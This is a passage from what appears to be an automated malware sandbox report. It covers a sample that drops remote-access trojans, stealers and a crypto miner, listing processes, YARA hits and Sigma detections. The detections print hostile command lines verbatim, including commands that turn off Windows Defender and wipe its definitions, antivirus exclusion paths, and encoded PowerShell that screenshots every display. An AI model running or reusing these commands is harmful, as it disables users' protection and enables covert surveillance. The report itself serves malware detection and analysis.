C4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 6496 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7528 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SIHClient.exe (PID: 7396 cmdline: C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)

RuntimeBroker2.0.exe (PID: 7176 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe" MD5: 95AF6E5D52A57515DC2E638C419F50D9)

WerFault.exe (PID: 7372 cmdline: C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 7320 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 7352 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

powershell.exe (PID: 7488 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 1344 cmdline: C:\Users\user\cscript.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cscript.exe (PID: 5596 cmdline: C:\Users\user\cscript.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Uninstall Information\cmd.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Uninstall Information\cmd.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\cscript.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\cscript.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 11 entries

Memory Dumps

Source	Rule	Description	Author
0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 87Bym0x4Fy.exe PID: 6912	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
Process Memory Space: RuntimeBroker2.0.exe PID: 7176	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
Process Memory Space: based.exe PID: 7704	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.87Bym0x4Fy.exe.3a24170.3.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
0.2.87Bym0x4Fy.exe.3a10508.2.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
0.2.87Bym0x4Fy.exe.3a37e08.1.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
29.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
29.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack	JoeSecurity_DiscordRat	Yara detected Discord Rat	Joe Security
29.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
29.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
29.3.svchost.exe.4e4e6ea.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
29.3.svchost.exe.4e4e6ea.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.3.s.exe.71dd711.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
21.3.s.exe.71dd711.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
42.0.ChainComServermonitor.exe.300000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
42.0.ChainComServermonitor.exe.300000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
29.3.svchost.exe.4e4e6ea.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
29.3.svchost.exe.4e4e6ea.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\87Bym0x4Fy.exe, ProcessId: 6912, TargetFilename: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", ProcessId: 6232, ProcessName: powershell.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7932, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAA